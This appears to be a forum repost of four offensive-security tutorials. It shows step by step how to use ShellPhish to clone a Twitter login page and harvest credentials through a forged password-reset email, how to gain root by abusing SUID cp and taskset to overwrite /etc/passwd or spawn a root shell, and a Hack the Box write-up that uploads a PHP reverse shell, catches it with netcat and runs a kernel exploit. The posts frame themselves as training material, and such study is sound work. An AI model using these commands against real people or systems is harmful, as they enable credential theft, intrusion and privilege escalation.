05-14-2020, 05:49 PM
| 0 | 0 | ||
Declarations: This article is posted only for educational purpose to spread awareness among people from being trapped in Phishing attack.
Table of Content
Phishing and Social Engineering
Installation
Exploring Templates
- Instagram
- Netflix
- Twitter
Phishing Attack
Phishing and Social Engineering
Phishing is probably one of the biggest issues for most organizations today, with network and endpoint defensive technology getting better and better, the bad guys aren’t trying to go after the though route and instead of going for the low hanging fruit. Phishing is one of those issues where training the employees is your best defence – try your best to make sure they can spot a malicious email and make sure that they can report it easily so that appropriate action can be taken as quickly as possible. The train of thought behind saying this is that – it’s beneficial to depend on multiple nodes of human intelligence to spot a potential threat, because even if one person spots and reports a phishing mail, it’s possible to run mass searches and find who all were targeted by a campaign.
Social engineering is a very interesting subject to think about, in this context, it is basically using the victim’s familiarity and habits against them. Human beings are creatures of habit, we are so used to certain things in our life that when faced with them, we don’t think twice before acting on them.
As an example; we are aware that there are a lot of attempts to by hackers to compromise social media accounts, so if one receives an email from your preferred social media site that there was an attempt to break into your account or an email to review your accounts security settings, most people will click on the link and log into their account to check what’s going on. A hacker will use this against a victim, all they need to do is swap a real link with a malicious one. Shellphish is probably one of the easiest ways to generate that malicious link. Let’s have a look.
Installation
Shellphish is fairly straight forward to install. It can be done on your Linux of choice, we will be using Kali. We fire up our Kali Linux and use the terminal to navigate to the desktop.
cd Desktop
1
cd Desktop
We need to clone the ShellPhish from GitHub, the download link is provided below.
git clone
[To see content please register here]
1
git clone
[To see content please register here]
This makes a folder named “shellphish” on our desktop. Let’s check the folder and its contents.
ls
cd shellphish/
ls
1
2
3
ls
cd shellphish/
ls
The next step is to change the permissions of the shellphish.sh file so that we as the admin can use it. We don’t want everyone to have open access to it.
chmod 744 shellphish.sh
1
chmod 744 shellphish.sh
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YjXyKtPbHWo/XR7QxkDH-tI/AAAAAAAAe_w/Va_QY8P6zw4bcVT8SXW_dAYg-SgUqctmgCLcBGAs/s1600/1.png?w=687&ssl=1)
And that’s it, now we can launch our phishing tool
./shellphish.sh
1
./shellphish.sh
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-FIrvqCZCNIU/XR7Qzvo4rTI/AAAAAAAAfAE/NUmX5n8uJCQsJTr2mmZFpBW9POSLu7HoACLcBGAs/s1600/2.png?w=687&ssl=1)
Exploring Templates
ShellPhish offers us 18 prebuilt templates, we will look through 3 of them to get an idea of what someone on the receiving end looks at when they get a link generated by this tool.
Get the Instagram page. The platform needs no introduction. We can see what the malicious link leads to, the page it shows is very convincing and might easily fool someone who isn’t paying attention.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-MVp5qrPvgCY/XR7Qznz5ZoI/AAAAAAAAfAI/03uUGTInfP8pQA0qa3X6bkJTiev8ZfEewCLcBGAs/s1600/5.png?w=687&ssl=1)
Similarly, you can generate another duplicate page i.e NETFLIX as shown below.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-WGzWcz7M4lw/XR7Qz7uCbVI/AAAAAAAAfAM/bfck_W4Psf43ED8ODhChzd6E6Hn_I6jpQCLcBGAs/s1600/6.png?w=687&ssl=1)
Weaponization for Twitter
Now we will see what the process of weaponizing a phishing link looks like.
Once again, let’s start ShellPhish.
./shellphish.sh
1
./shellphish.sh
ShellPhish gives us a multitude of templates to choose from, all we need to do is follow the prompts the tool gives us.
We will choose the “Twitter template” for this demonstration.
4
We will be choosing option 2 here and using the Ngrok service to host our phishing link, this is what gives us the HTTPS on our phishing pages. Just by choosing this option, the tool starts a php and Ngrok server and we have our phishing link presented to us.
2
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-PaRIYD_cpkk/XR7Q0GPjm6I/AAAAAAAAfAQ/Lxou5NQHdEATw5fJybJMLt2fbP7BD2DogCLcBGAs/s1600/7.png?w=687&ssl=1)
Now that we have our link, what do we do? What would a malicious actor do?
We won’t put in too much work into what is about to happen next, it’s more so to demonstrate a process that is commonly used. The first thing we need is an email sent by Twitter to a user to make them aware of a suspicious attempt to log in to their account and that they should secure their account by resetting their password. The catch here is that the user will first have to log into their account to reset their password.
Here is our email that conveys good intentions. Notice the “Reset Password” button.
We delete the “Reset Password” button, highlight where it says “password” in the “Secure your account by resetting your password now.”.
Click on the “Insert Hyperlink” function given in the formatting bar. We copy the link given to us by ShellPhish in the Kali terminal. See the section in the terminal that says, “Send this link to the victim:
[To see content please register here]
”. This link is pasted in the section that says, “Web address (URL)” and we click OK.That’s it, we now have our weaponized email, ready to be sent to our victim
Phishing Attack
The victim has received the weaponized email, The moment the “password” link is clicked, the ShellPhish tool starts showing signs of activity. We can see that the tool gives us certain details like the IP of the victim, the browser they are using, the country and the city they reside in, etc.
Once the link is clicked, the victim is presented with a twitter page where they can enter their credentials to access their account so that they may change their password. We have volunteered to be the victim in this demonstration and are entering our account email “[email protected]” and password “12345wetrtt”
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-VyFkufVCFHk/XR7QyfSiRbI/AAAAAAAAe_4/VvS3oBqMEDgSCboW8aA0EDRKKMZLdTCGQCLcBGAs/s1600/17.png?w=687&ssl=1)
The moment we click on the “Log in” button, we are redirected to the actual Twitter site. Seems harmless right?
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-sL8MQUpKQTw/XR7QySeQyjI/AAAAAAAAe_8/Fh1-NTqH_xkLmaRv48gy1aXg0clo2WFQgCLcBGAs/s1600/18.png?w=687&ssl=1)
Now for the scary part, the credentials the victim entered have been ferried away to the malicious actor in plain text. Lo and behold! The tool proudly announces, “Credentials Found!”.
You can see the account name and password in plain text. The thing that really stood out was the line that tells us the currency used in the country the victim resides in, we’ll leave it to you to figure out why that is.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-2PDVXKsZs8g/XR7QzGWE6OI/AAAAAAAAfAA/3okVUqJINYArBF2lRPOIti1VZjhCSHadACLcBGAs/s1600/19.png?w=687&ssl=1)
Declarations: This article is posted only for educational purpose to spread awareness among people from being trapped in Phishing attack.
This tool shows us how easy phishing attacks have become to execute and depending on how determined a malicious actor is, there is a lot of creativity that they can put into making the email look as legitimate as possible. Just to give you an idea of how serious the issue of phishing is, according to a recent
[To see content please register here]
– 3.4 billion fake emails are sent out daily!Email firewalls mostly depend on threat intel or on the strength of their filters which dictate how much scrutiny they exercise on each email that hits a domain and how quick they can be to deem an email malicious.
The problem is that, if you don’t set the strength of these filters to a balanced setting, they will flag and block more emails than you would want, making the email firewall admins phone blow up. Not to mention the amount of business that will be hindered.
So, that’s why internal human intelligence is a big tool at our disposal when it comes to spotting malicious emails. There are many free resources to educate your employees and peers on how to spot a malicious email, this is one of those resources and probably one of the best ones around –
[To see content please register here]
As always, we at Hacking Articles hope you enjoyed this article and share it with your collogues.
Have fun and stay ethical.
In this article, we are going to grasp another very worthwhile command i.e. “cp” (copy) and will cover all the basic function of ‘cp” command that a user can use. As we know this command helps in copying the file/directories from the source to destination so, in this article we will study how we can attain the utility of this command in Privilege Escalation.
Note: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”
Table of Content
Introduction to cp
- Major Operation performed using cp
- SUID Lab setups for Privilege Escalation
- Exploiting SUID
cp stands for copy. This command helps to copy files or group of files or directory from its source location to the destination. This generates an exact image of a file on a disk with the different file name. cp command needs at least two filenames in its arguments.
Very first, we will run its help command to make our readers more aware of the use of “cp” command.
cp --help
1
cp --help
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-1A_EeDBZP8I/XRmM5Xp96PI/AAAAAAAAe-k/u1zfl0qkXswEkdy9iXxZoss3gp-A03-AgCLcBGAs/s1600/1.png?w=687&ssl=1)
Copy single file to the destination: As said above that cp command helps the user to copy the content of source file to its destination so now, here I am replicating the content of single file (raj.txt) to new file (chiya.txt). If the destination file already exits so this command simply overwrites the file without any warning message but if the destination file doesn’t exist, then first “cp” will create a new file then will copy the content of source file as per user’s desire.
cp raj.txt chiya.txt
1
cp raj.txt chiya.txt
By framing the above command cp will copy all the content of file raj.txt to chiya.txt as shown in below image.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-nFrS-oO8sFo/XRmM7dbd8NI/AAAAAAAAe-4/m0Te1nuZZUYZl9p0geFcsaBp-wBr3DzuACLcBGAs/s1600/2.png?w=687&ssl=1)
Copy multiple files to a directory: By the help of this command, we not only copy the single file but also can copy multiple files to a directory whenever needed. Suppose we have multiple files as shown in the below image for the reader’s reference and we want to copy all at once to a specific directory then we can frame command as shown below:
cp 1 2 3 chiya.txt demo/
1
cp 1 2 3 chiya.txt demo/
By this command cp will copy the entire content from the file “1,2,3, chiya.txt” to mentioned destinated directory. If the directory doesn’t exist then first it will create a new directory and will copy the content to it but, if the directory already exists then cp will erase all content from the destinated directory and will simply overwrite to it so be careful while copying the content from source to location.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-t6QZyxq5Wfs/XRmM7oiDveI/AAAAAAAAe-8/7ChM_gwRFoYSLF-LXtioe7s7FpNnYf1bQCLcBGAs/s1600/3.png?w=687&ssl=1)
Copy source directory to the destination: With this option “cp” command shows its recursive performance by replicating the entire directory structure recursively. Suppose we want to copy all files and directories that a directory contains then in this case we will simply copy the whole directory instead to copy its files one by one to our desired destinated path.
In the below image I have copied the entire content of source directory “ignite” to destinated directory “demo2” (which is not exits). One can use -r or -R both argument for this purpose.
cp -R ignite demo2
1
cp -R ignite demo2
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-SK9-iwW7vEE/XRmM77pw5BI/AAAAAAAAe_A/9era90IuiVcSie7IKGPxDzf3JCoelAdrQCLcBGAs/s1600/4.png?w=687&ssl=1)
Interactive prompt: Normally when we use the cp command then it simply overwrites the file if it exists so to make it prompt for confirmation while copying a file, we will use the option “-i”. Using this argument, the command will prompt to overwrite the file which helps the user to save the content from being erased while copying from source to destination.
cp -i chiya.txt author
1
cp -i chiya.txt author
Here I want to copy the content of “chiya.txt” to “author” which have some of its own content so when I will use “-i” option then it will prompt me for its confirmation of overwriting the text.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-fAO9-ArYQtU/XRmM8B8eq0I/AAAAAAAAe_E/6BztlV8nDpoW2aG2EpXFIRv8mgzsFIw7wCLcBGAs/s1600/5.png?w=687&ssl=1)
Backup a file: Whenever we need to create a backup of the destination file then we will use the “-b” option for this purpose. cp helps to create a backup of the file in the same folder with the different name and in a different format.
cp -b chiya.txt author
1
cp -b chiya.txt author
On framing the above command cp will create a backup of file “author” in the same folder with a different name.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-Fh3JPMmVXpI/XRmM8sGCQTI/AAAAAAAAe_I/8l2DofD7ybchNCqBc8LnV5voC6fzvexRACLcBGAs/s1600/6.png?w=687&ssl=1)
Copying using * wildcard: Suppose we have many text documents in a directory, and we want to replicate it into another directory so, copy all files one by one will take lots of time if specify all file names as the argument but by using * wildcard it becomes simple.
cp *.txt folder
1
cp *.txt folder
On typing above command, cp will copy all “txt” to destination.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-2RfnMQaw1YQ/XRmM8s86VfI/AAAAAAAAe_M/sZsJaqoXzpI5jn0XcMDFXjRmPloAPwsFgCLcBGAs/s1600/7.png?w=687&ssl=1)
Force copy: Sometimes it happens when user unable to open a file to perform writing operation due to permission which is set upon that in such case we use force copy “-f” option in cp command which helps the user to delete the destinated file first and then copying of content is done from source to destination file.
cp -f chiya.txt Example.txt
1
cp -f chiya.txt Example.txt
In the below screenshot we have seen that Example.txt file doesn’t have write permission to it so on using “-f” argument followed by cp command user can copy the content of source file to destination file.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-aFNE6MkORzc/XRmM9OCOsVI/AAAAAAAAe_Q/hk3QiF-3BmcCpgiLY86lEb5IbUooOf35wCLcBGAs/s1600/9.png?w=687&ssl=1)
SUID Lab setups for Privilege Escalation
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Assume we are accessing the victim’s machine as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.
Read more from here:
[To see content please register here]
Now we are going to give SUID permission on cp so that a local user can take the privilege of cp as the root user.
Hence type following for enabling SUID bit:
which cp
chmod u+s /bin/cp
ls -la /bin/cp
1
2
3
which cp
chmod u+s /bin/cp
ls -la /bin/cp
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-xt2HnaHRmYs/XSAdNiGOVnI/AAAAAAAAfAw/f4eRQT3KhWk6UsvE4dF47XJkXIuF5TCHACLcBGAs/s1600/10.png?w=687&ssl=1)
Exploiting SUID
For this, we will connect to the target machine with ssh, therefore, type following command to get access through local user login.
ssh [email protected]
1
ssh [email protected]
Then use find command to identify binaries having SUID permission.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
So here we came to know that SUID bit is enabled for so many binary files, but we need /bin/cp.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-bmq6Pve2TZ0/XSAdONSlmzI/AAAAAAAAfA4/Pe8ouOKc0LoiuA2_U1JOPhHbG3kv_CslwCLcBGAs/s1600/12.png?w=687&ssl=1)
As we know, cp has suid permission so taking advantage of this right we will try to escalate the root privilege by injecting a new user inside the /etc/passwd file.
First, we will open our /etc/passwd file followed by a tail command which will read this file from its end and help us to know that the file ends with the user “test”.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-XYSMhSg-WW4/XRmM6Ea7wJI/AAAAAAAAe-o/d6qxjwKLRxgoh9BhrKYDAV7MtWf4KpgSgCLcBGAs/s1600/13.png?w=687&ssl=1)
Now we are creating the salt value of password for our new user and this will be done by using “openssl” following by the command as mentioned in the screenshot below.
openssl passwd -1 -salt ignite pass123
1
openssl passwd -1 -salt ignite pass123
And we will get our hash value copy it for further use.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-c-GHQGCWKM0/XRmM6cyAw9I/AAAAAAAAe-s/OQVjNR_nR0wldCsVMZpFov48LUq7xQbxQCLcBGAs/s1600/14.png?w=687&ssl=1)
On moving ahead for the completion of this task now I have copied the entire content of /etc/passwd file in our local machine and will edit a new record for the user “chiya” then paste the above-copied hash password in the record as shown below.
Name this file as passwd and run python HTTP server for transferring this file into victim’s machine.
python -m SimpleHTTPServer
1
python -m SimpleHTTPServer
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-f8tvzPf9rv0/XRmM6VXM7fI/AAAAAAAAe-w/M19QvEpvIMIKRumMmeEd-w44-SCoqlmDQCLcBGAs/s1600/15.png?w=687&ssl=1)
Now we want to inject our modified passwd file inside /etc folder to replace the original passwd file. We will use wget to download the passwd file from our machine (Kali Linux) inside /tmp directory.
cd /tmp
wget
[To see content please register here]
1
2
cd /tmp
wget
[To see content please register here]
Now by the help of cp command, we can easily copy the content of source file to the destination as shown in below image.
cp passwd /etc/passwd
tail /etc/passwd
1
2
cp passwd /etc/passwd
tail /etc/passwd
Now let’s switch to user chiya that own root user’s privileges and can access the root shell.
su chiya
password: pass123
id
1
2
3
su chiya
password: pass123
id
Conclusion: Hence you can notice from the given below image we have escalated the root privilege by abusing SUID permission on cp. Similarly, we can exploit the sudo permission assign on CP program.
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-sbR6s5_QWjA/XRmM6tWbnfI/AAAAAAAAe-0/WCX_wpllX3UmTFvS8M7YwEIit6O1BO82QCLcBGAs/s1600/16.png?w=687&ssl=1)
In this article, we’ll talk about taskset command which is a Linux utility and learn how helpful the tasket command is for Linux penetration testing and how we’ll progress tasket utility to scale the greater privilege shell.
Note: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”
Table of Content
- Introduction to TASKSET
- Major Functions of TASKSET command
- Sudo rights Lab setups for Privilege Escalation
- Exploiting Sudo Rights
- SUID Lab setup for privilege escalation
- Exploiting SUID Rights
Taskset is used to set or retrieve the CPU affinity of a running process given its PID or to launch a new COMMAND with a given CPU affinity. The CPU affinity is a scheduler property that “bonds” a process to a given set of CPUs on the system. The Linux scheduler will honor the given CPU affinity and the process will not run on any other CPUs. Note that the Linux scheduler also supports natural CPU affinity: the scheduler attempts to keep processes on the same CPU as long as practical for performance reasons. Therefore, forcing a specific CPU affinity is useful only in certain applications.
Major Functions of Tasket command
At first, we will run taskset -h command which means help and which will tell us about all the options which are available in TASKSET command as we can see in the picture below.
taskset -h
1
taskset -h
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YZtrPyL0bUA/XRN2OxWmw1I/AAAAAAAAe9s/tSTXDMgx5PgFC_s0kj8gsnpuvxFsz20oACLcBGAs/s1600/1.png?w=687&ssl=1)
Top Command:
The top command is one of the basic commands to monitor server processes in Linux. The top command shows all running processes in the server. It shows you the system information and the processes information just like up-time, average load, tasks running, no. of users logged in, no. of CPU processes, RAM utilization and it lists all the processes running/utilized by the users in your server.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-IUln0JKgV9A/XRN2O-xA7SI/AAAAAAAAe9k/vMM4CJpwGOs6GsVBye40HLviVkvWeJWWwCLcBGAs/s1600/2.png?w=687&ssl=1)
Usage
I will take the process id (PID) of 1988 as shown in the above image as an example to show the usage of taskset command.
If you want taskset to display CPU affinity of all the tasks of an already running process (PID), use the command in the following way:
taskset -ap 1988
1
taskset -ap 1988
If you want taskset to display CPU affinity of only a current task of an already running process (PID), use the command in the following way:
taskset -p 1998
1
taskset -p 1998
If you want taskset to display CPU affinity of an already running process (PID) in a list format, use the command in the following way:
taskset -cp 1988
1
taskset -cp 1988
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-aeb7CDGsZn0/XRN2O5AlqbI/AAAAAAAAe9o/PSFxaHvsKjMCZ1RDzMOQkxIlVsdk8CEfgCLcBGAs/s1600/3.png?w=687&ssl=1)
Sudo rights Lab setup for Privilege Escalation
Now here our next step is to set up the lab of Sudo rights or in other words to provide Sudo privileges to a user for the taskset executable. Here we are going to add a user by the name of the test in the Sudoer’s file and we have given permission to user test to run the taskset command as the root user.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-84FmTQVkW0Q/XRN2P9m5VfI/AAAAAAAAe9w/huUrOJFe6cIwJu-_vXNuzzPy77YqYk9IQCLcBGAs/s1600/4.png?w=687&ssl=1)
Exploiting Sudo Rights
Now we will connect through ssh in kali and after that, we will run sudo -l which is sudo list and through which we can see that user test has the permission to run taskset as a root user.
ssh [email protected]
sudo -l
1
2
ssh [email protected]
sudo -l
Now our next step is to exploit sudo rights through taskset command, so we will run the below-mentioned command with sudo rights and will get the bash shell of the target machine with root privileges.
sudo taskset 1 /bin/sh –p
id
1
2
sudo taskset 1 /bin/sh –p
id
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-lgGvCmpTkWg/XRN2QJrEfXI/AAAAAAAAe90/2u0v9d-HTRI_bF0tZ2iC0xHsHpnL7txQwCLcBGAs/s1600/5.png?w=687&ssl=1)
SUID Lab setups for Privilege Escalation
As we know the SUID bit permission enables the user to execute any files as the ownership of existing file member. Now we are enabling SUID permission on taskset so that a local user can take the opportunity of taskset as the root user.
Type the following commands for enabling the SUID bit:
which taskset
chmod u+s /usr/bin/taskset
ls –la /usr/bin/taskset
1
2
3
which taskset
chmod u+s /usr/bin/taskset
ls –la /usr/bin/taskset
Now from the below image you can see the suid bit is set for taskset, now it’s time for the exploitation.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-mA4rVyTtFfU/XRN2Qa-6IFI/AAAAAAAAe94/xYQj9voKQXE5TZxnY-oGDgvfsG0MehV6gCLcBGAs/s1600/6.png?w=687&ssl=1)
Exploiting SUID
Now again we will connect through ssh in kali to our victim machine using test user and after that, we will use Find command to identify binaries having SUID permission.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
So from the below image, we can confirm that SUID bit is enabled for our concerned binary: /usr/bin/taskset
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-qma-IH3chrU/XRN2QmYaaJI/AAAAAAAAe98/saM_Csu_V68RRJparlpTxV-MlP3lqN9GwCLcBGAs/s1600/7.png?w=687&ssl=1)
As we now know that we can run taskset with root privileges, so we are going to take advantage of that fact to add a new user with root privileges to /etc/passwd file, so that we can get access of the target machine with full root privileges.
Create a password hash for new user mark and password pass123 using openssl.
openssl passwd -1 –salt mark pass123
1
openssl passwd -1 –salt mark pass123
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-MI3wIxGt4ww/XRN2Ql5nh7I/AAAAAAAAe-A/gL40cKQ8cQsGha7T0S-3eDqt-225adS0gCLcBGAs/s1600/8.png?w=687&ssl=1)
Now using echo with the taskset command we have added the new user mark with root privileges into the /etc/passwd file of the target machine and then log in the system with mark using su command and enjoy the root privileges.
taskset 1 echo 'mark:$1$mark$PL9HIgTDwnE9sG27q2Nrb/:0:0:root/:root:/bin/bash' >>/etc/passwd
su mark
id
1
2
3
taskset 1 echo 'mark:$1$mark$PL9HIgTDwnE9sG27q2Nrb/:0:0:root/:root:/bin/bash' >>/etc/passwd
su mark
id
Conclusion: In this post, we have talked on taskset command to demonstrate how a to intruder can escalate the privilege using tasket utility due to permissions allowed on it.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-B0oLA7WbWuQ/XRN2RIvK8lI/AAAAAAAAe-E/IjGxSvttN-Y7dgDM8WZ4-kpucdtD89KSwCLcBGAs/s1600/9.png?w=687&ssl=1)
Help is a recently retired CTF challenge VM on Hack the Box and the objective remains the same– Capture the root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of Help is 10.10.10.121
Penetration Methodology
Scanning
- Network Scanning (Nmap)
- Web Spidering (dirb)
- Analyzing the behaviour of submitting ticket script
- Uploading PHP shell and noting the timestamp
- Converting shell+timestamp to md5 hash
- Finding shell on the web server
- Getting reverse shell through netcat
- Reading user.txt
- Finding kernel exploit of Linux 4.4.0 version.
- Compiling with GCC and escalating privilege
- Reading root.txt
Scanning
Let’s start off with the most obvious step, that is nmap to check open ports.
nmap -A 10.10.10.121
1
nmap -A 10.10.10.121
Here I found port 22 for SSH, 80 and 3000 for HTTP are opened others were filtered
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-sc_ZXSQfbMw/XQ-J6ggN-II/AAAAAAAAe8U/o-DzbU93K7k0JY93ZlNeEamrbEU7zxwvACLcBGAs/s1600/1.png?w=687&ssl=1)
We immediately proceed towards port 80 when we see it open. But there was absolutely nothing on the homepage.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-nvGkhMfp8GY/XQ-J8Gxx2aI/AAAAAAAAe8k/vnJXccC7sHIAeQHf9Q7DrZayKiBmHjrkQCLcBGAs/s1600/2.png?w=687&ssl=1)
Enumeration
But maybe, there is some other directory which is set as a homepage for a web application, so we won’t stop ourselves from directory enumeration with dirb.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-sm2r9MABxVk/XQ-J8qR5axI/AAAAAAAAe8w/hTu--E4JP6IvRIdEJBxBI5dUzuqzaCw9gCLcBGAs/s1600/3.png?w=687&ssl=1)
Here we found two directories, one is the javascript directory which seems of less use as per usual. But then there is another directory called /support which seemed interesting. We checked it on the browser, and it seemed like a ticketing system.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-UUq1od2V0og/XQ-J9INZBkI/AAAAAAAAe80/73Mla8Pq97Mn7mpQzuw22t642y6XvjgKwCLcBGAs/s1600/4.png?w=687&ssl=1)
Exploiting
Now, it is obvious that there will be a file upload option given in any ticketing system. And maybe, it is also possible that there is a vulnerability in the file upload mechanism.
We created a sample text file called demo.txt just to check whether the system is actually accepting uploads or not.
It seemed to be working fine!!
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-wEAvXFKAhZU/XQ-J9cL7hMI/AAAAAAAAe84/xTxi_vt0oao0iz6Fq2AP9B5c1jIXY53CgCLcBGAs/s1600/5.png?w=687&ssl=1)
It successfully got uploaded and redirected us back to the homepage.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-6RnjNo_kvI8/XQ-J9usn38I/AAAAAAAAe88/H14TGSDcEwMWvWyyZEieH84hs8zLVnlfQCLcBGAs/s1600/6.png?w=687&ssl=1)
Now we tried enumerating the web server on a deeper level, but we couldn’t see our text file anywhere. It is possible that the php backend would have just renamed the file as per dev defined rules. Only if there was a way to check the code!
After googling HelpDeskZ, we found that the source code was available on GitHub. And that could actually give us a closer look at the code of the upload script.
Now, in controllers/submit_ticket_controller.php, we found the code that was responsible for uploading a file on the server.
There are three interesting noteworthy things here:
- The file uploaded is going to “/support/<Upload_dir>/tickets”
- There is no check on the type of file being uploaded! The error message is generated after the file is already uploaded so it has no actual significance!
- File uploaded is being converted to a format: md5(shellname+ epoch timestamp) + .php
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-iRQgax9f6Ng/XQ-J6yV9BbI/AAAAAAAAe8Y/k7LsrO1G8_s1hV7O4lRm1Ffzd6kBCW2RwCLcBGAs/s1600/10.png?w=687&ssl=1)
So, it is pretty clear that we will upload a php reverse shell (we took pentester monkey’s reverse netcat php shell) and work towards exploiting this file upload vulnerability. But we were unable to find our text file a few minutes ago. Now that we know what the format of storing the file on the web server is, let’s work our way towards manually creating an md5 hash.
For this, we need to know the current time on the web server. Our time zone could be way different than the server’s and to generate an exact timestamp, we upload a php shell while capturing the network request in developer tools in Firefox.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-oRQ8S_mIvl0/XQ-J-du_ANI/AAAAAAAAe9E/XtI6ZTwXxdoHQaeIUNqjYSHVwaq13QlXACLcBGAs/s1600/8.png?w=687&ssl=1)
Now that we had the time in GMT, we headed to
[To see content please register here]
and converted this time into an epoch timestamp.![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-PRZsKxFkJP0/XQ-J-gUJLrI/AAAAAAAAe9I/--boaTuViPAPc4hFtEb84s2M12P5hSuBgCLcBGAs/s1600/9.png?w=687&ssl=1)
Now that we had obtained this timestamp, we could either write a short script in PHP that uses an md5 hash function to generate the hash or we can simply open the php in an interactive mode:
php –a
echo md5("myshell.php1560956116");
1
2
php –a
echo md5("myshell.php1560956116");
Your timestamp will vary than ours.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-2FYNmzYSa8c/XQ-J6mqf3gI/AAAAAAAAe8Q/GXf4lvk1ktwzlxBor7fB_mw__R7oXOQaACLcBGAs/s1600/11.png?w=687&ssl=1)
Now that it had given us a hash, all was left to do was to find it and open it in our browser, set a reverse nc connection and get a shell.
And in the article above you can see that we know it is being uploaded to “/support/<upload_dir>/tickets” but the problem was we didn’t know what the name of upload directory is. Our best bet was going with the name “uploads” since we saw that folder name in the GitHub files as well.
So, we set a reverse netcat listener and got a shell immediately! We spawned a proper TTY using python and read the user.txt file in home directory.
nc –lvp 1234
python –c 'import pty;pty.spawn("/bin/bash")'
cd /home/help
cat user.txt
1
2
3
4
nc –lvp 1234
python –c 'import pty;pty.spawn("/bin/bash")'
cd /home/help
cat user.txt
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YKgEHp-zGUc/XQ-J7wlXwII/AAAAAAAAe8g/DJ27x79gaL8-6uo9ip4wHi6nELROwafLACLcBGAs/s1600/19.png?w=687&ssl=1)
Privilege Escalation
Now for the privilege escalation part, we checked the kernel version with uname –a and found it to be vulnerable to a kernel exploit. We downloaded it using searchsploit and That made it super easy!
searchsploit 4.4.0-116
searchsploit –m 44398
python –m SimpleHTTPServer 8081
1
2
3
searchsploit 4.4.0-116
searchsploit –m 44398
python –m SimpleHTTPServer 8081
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-c22mlb1Wdyg/XQ-J8TPNbtI/AAAAAAAAe8o/8RLPcB6D4VYkO0fMZGimXc-7_1-c6SsyACLcBGAs/s1600/20.png?w=687&ssl=1)
We changed the directory to tmp and downloaded this exploit using wget command, compile it with GCC and boom went the magic!
wget
[To see content please register here]
gcc 44298.c -o kernel./kernel
cd /root
1
2
3
4
wget
[To see content please register here]
gcc 44298.c -o kernel./kernel
cd /root
And voila! That’s how we escalated privilege in Help CTF and read the congratulatory message under root directory in root.txt.
